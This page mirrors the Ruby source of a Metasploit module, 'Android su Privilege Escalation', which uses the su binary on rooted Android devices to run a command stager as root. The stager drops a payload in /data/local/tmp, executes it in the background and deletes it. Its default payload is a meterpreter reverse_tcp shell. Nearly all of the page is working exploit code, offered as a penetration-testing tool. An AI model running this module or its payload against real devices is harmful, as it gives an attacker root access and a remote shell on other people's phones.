Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/local/su_exec.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Post::File

11
  include Msf::Post::Android::Priv

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => "Android 'su' Privilege Escalation",

19
          'Description' => %q{

20
            This module uses the su binary present on rooted devices to run

21
            a payload as root.

22


23
            A rooted Android device will contain a su binary (often linked with

24
            an application) that allows the user to run commands as root.

25
            This module will use the su binary to execute a command stager

26
            as root. The command stager will write a payload binary to a

27
            temporary directory, make it executable, execute it in the background,

28
            and finally delete the executable.

29


30
            On most devices the su binary will pop-up a prompt on the device

31
            asking the user for permission.

32
          },

33
          'Author' => 'timwr',

34
          'License' => MSF_LICENSE,

35
          'DisclosureDate' => '2017-08-31',

36
          'SessionTypes' => [ 'meterpreter', 'shell' ],

37
          'Platform' => [ 'android', 'linux' ],

38
          'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],

39
          'Targets' => [

40
            ['aarch64', { 'Arch' => ARCH_AARCH64 }],

41
            ['armle', { 'Arch' => ARCH_ARMLE }],

42
            ['x86', { 'Arch' => ARCH_X86 }],

43
            ['x64', { 'Arch' => ARCH_X64 }],

44
            ['mipsle', { 'Arch' => ARCH_MIPSLE }]

45
          ],

46
          'DefaultOptions' => {

47
            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',

48
            'WfsDelay' => 5

49
          },

50
          'DefaultTarget' => 0,

51
          'Notes' => {

52
            'SideEffects' => [ ARTIFACTS_ON_DISK ],

53
            'Reliability' => [ REPEATABLE_SESSION ],

54
            'Stability' => [ CRASH_SAFE ]

55
          }

56
        }

57
      )

58
    )

59
    register_options([

60
      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),

61
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),

62
    ])

63
  end

64


65
  def base_dir

66
    datastore['WritableDir'].to_s

67
  end

68


69
  def su_bin

70
    datastore['SU_BINARY'].to_s

71
  end

72


73
  def exploit

74
    if is_root?

75
      fail_with(Failure::BadConfig, 'Session already has root privileges')

76
    end

77


78
    linemax = 4088 - su_bin.size

79
    execute_cmdstager({

80
      flavor: :echo,

81
      enc_format: :octal,

82
      prefix: '\\\\0',

83
      temp: base_dir,

84
      linemax: linemax,

85
      background: true

86
    })

87
  end

88


89
  def execute_command(cmd, _opts)

90
    cmd_exec("#{su_bin} -c '#{cmd}'")

91
  end

92
end

93


94